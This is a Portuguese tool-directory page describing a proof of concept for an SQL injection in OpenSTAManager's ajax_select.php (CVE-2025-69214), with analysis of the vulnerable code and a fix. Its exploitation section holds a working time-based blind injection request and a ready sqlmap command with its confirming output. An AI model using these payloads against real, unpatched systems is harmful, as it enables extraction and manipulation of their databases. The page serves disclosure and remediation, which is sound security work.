Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-69214 — Prova de conceito para CVE-2025-69214: injeção SQL no ponto de extremidade do componente ajax_select.php do OpenSTAManager. Inclui análise de código vulnerável, exploração cega baseada em tempo com SQLMap e orientação de correção. | Kitploit
Ferramentas/GitHubGitHub/lukasz-rybak/cve-2025-69214
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoSegurança de Banco de Dados
GitHublukasz-rybak/cve-2025-69214

CVE-2025-69214

Prova de conceito para CVE-2025-69214: injeção SQL no ponto de extremidade do componente ajax_select.php do OpenSTAManager. Inclui análise de código vulnerável, exploração cega baseada em tempo com SQLMap e orientação de correção.

Ver Repositório
3há 5 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-69214: OpenSTAManager tem uma Injeção de SQL em ajax_select.php (endpoint componenti)

Visão Geral

CampoDetalhes
ID CVECVE-2025-69214
SeveridadeALTA
AvisoVer Aviso
Descoberto porLukasz Rybak

Produtos Afetados

  • devcode-it/openstamanager (versões: <= 2.9.8)

Classificação CWE

  • CWE-89: Neutralização Imprópria de Elementos Especiais usados em um Comando SQL ('Injeção de SQL')

Detalhes

Resumo

Existe uma vulnerabilidade de Injeção de SQL no endpoint ajax_select.php ao manipular a operação componenti. Um atacante autenticado pode injetar código SQL malicioso através do parâmetro options[matricola].

Prova de Conceito

Código Vulnerável

Arquivo: modules/impianti/ajax/select.php:122-124

root@kitploit:~
case 'componenti':
    $impianti = $superselect['matricola'];
    if (!empty($impianti)) {
        $where[] = '`my_componenti`.`id_impianto` IN ('.$impianti.')';
    }

Fluxo de Dados

  1. Origem: $_GET['options']['matricola'] → $superselect['matricola']
  2. Vulnerável: Entrada do usuário concatenada diretamente na cláusula IN() sem sanitização
  3. Sumidouro: Consulta executada via framework AJAX

Exploração

PoC Manual (SQLi Cego Baseado em Tempo):

root@kitploit:~
GET /ajax_select.php?op=componenti&options[matricola]=1) AND (SELECT 1 FROM (SELECT(SLEEP(5)))a) AND (1 HTTP/1.1
Host: localhost:8081
Cookie: PHPSESSID=<valid-session>
imagem

Exploração com SQLMap:

root@kitploit:~
sqlmap -u 'http://localhost:8081/ajax_select.php?op=componenti&options[matricola]=1*' \
  --cookie="PHPSESSID=<session>" \
  --dbms=MySQL \
  --technique=T \
  --level=3 \
  --risk=3

Saída do SQLMap:

root@kitploit:~
[INFO] URI parameter '#1*' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
Parameter: #1* (URI)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: options[matricola]=1) AND (SELECT 7438 FROM (SELECT(SLEEP(5)))grko)-- SvRI
back-end DBMS: MySQL >= 5.0.12
imagem

Impacto

  • Exfiltração de Dados: Injeção SQL cega baseada em tempo permite extração completa do banco de dados
  • Desvio de Autenticação: Acesso a dados sensíveis de componentes e equipamentos
  • Manipulação de Dados: Potencial modificação não autorizada de registros

Correção

Converter valores para inteiros antes de usar no SQL:

Antes:

root@kitploit:~
$impianti = $superselect['matricola'];
if (!empty($impianti)) {
    $where[] = '`my_componenti`.`id_impianto` IN ('.$impianti.')';
}

Depois:

root@kitploit:~
$impianti = $superselect['matricola'];
if (!empty($impianti)) {
    $ids = array_map('intval', explode(',', $impianti));
    $where[] = '`my_componenti`.`id_impianto` IN ('.implode(',', $ids).')';
}

Crédito

Descoberto por: Łukasz Rybak

Referências

  • https://github.com/devcode-it/openstamanager/security/advisories/GHSA-qjv8-63xq-gq8m
  • https://nvd.nist.gov/vuln/detail/CVE-2025-69214
  • https://github.com/advisories/GHSA-qjv8-63xq-gq8m

Aviso Legal

Este CVE foi divulgado de forma responsável seguindo práticas coordenadas de divulgação de vulnerabilidades. As informações fornecidas aqui são apenas para fins educacionais e defensivos.

Baixar ferramenta